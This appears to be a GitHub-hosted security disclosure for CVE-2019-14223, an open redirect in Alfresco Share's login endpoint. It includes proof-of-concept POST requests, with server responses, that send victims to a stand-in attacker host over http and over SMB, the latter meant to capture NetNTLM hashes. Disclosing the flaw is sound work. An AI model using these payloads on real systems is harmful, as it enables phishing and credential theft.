Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2019-14223-Open Redirect in Alfresco Share-Alfresco Community/
Disclosures/CVE-2019-14223-Open Redirect in Alfresco Share-Alfresco Community/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2019-14223: Open Redirect in Alfresco Share

The Alfresco Share application, versions below 5.2.6, 6.0.N and 6.1.N, is vulnerable to an Open Redirect attack via a crafted POST request.
By manipulation the "failure" parameter an attacker can redirect a victim to a malicious website over any protocol the attacker desires (Ex. http, https, ftp, smb, etc.).

Fixed Versions

Fix Version
5.2.6
6.0.N
6.1.N

Redirect Over the Same Protocol

This is a redirect over the same protocol used to access the login page (http/https) and can be used to redirect the client to a malicious website used for phishing or that targets the browser itself.

  • Request:
POST /share/page/dologin HTTP/1.1
Host: <TARGET_IP>:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

success=%2Fshare%2Fpage%2F&failure=:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass
  • Response:
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=71***TRUNCATED***53; Path=/share; Secure; HttpOnly
Location: \\mal.hexor:4444\mal\evil.html
Content-Length: 0
Date: Mon, 13 May 2019 14:27:47 GMT

Redirect Over Specific Protocol (SMB, FTP, etc.)

In this case the "smb" protocol can be used in order to potentially exfiltrate the victims NetNTLM hash.

  • Request:
POST /share/page/dologin HTTP/1.1
Host: <TARGET_IP>:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

success=%2Fshare%2Fpage%2F&failure=:smb:\\mal.hexor:4444\mal\evil.html&username=baduser&password=badpass
  • Response:
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: JSESSIONID=2C***TRUNCATED***DF; Path=/share; Secure; HttpOnly
Location: smb:\\mal.hexor:4444\mal\evil.html
Content-Length: 0
Date: Mon, 13 May 2019 15:23:34 GMT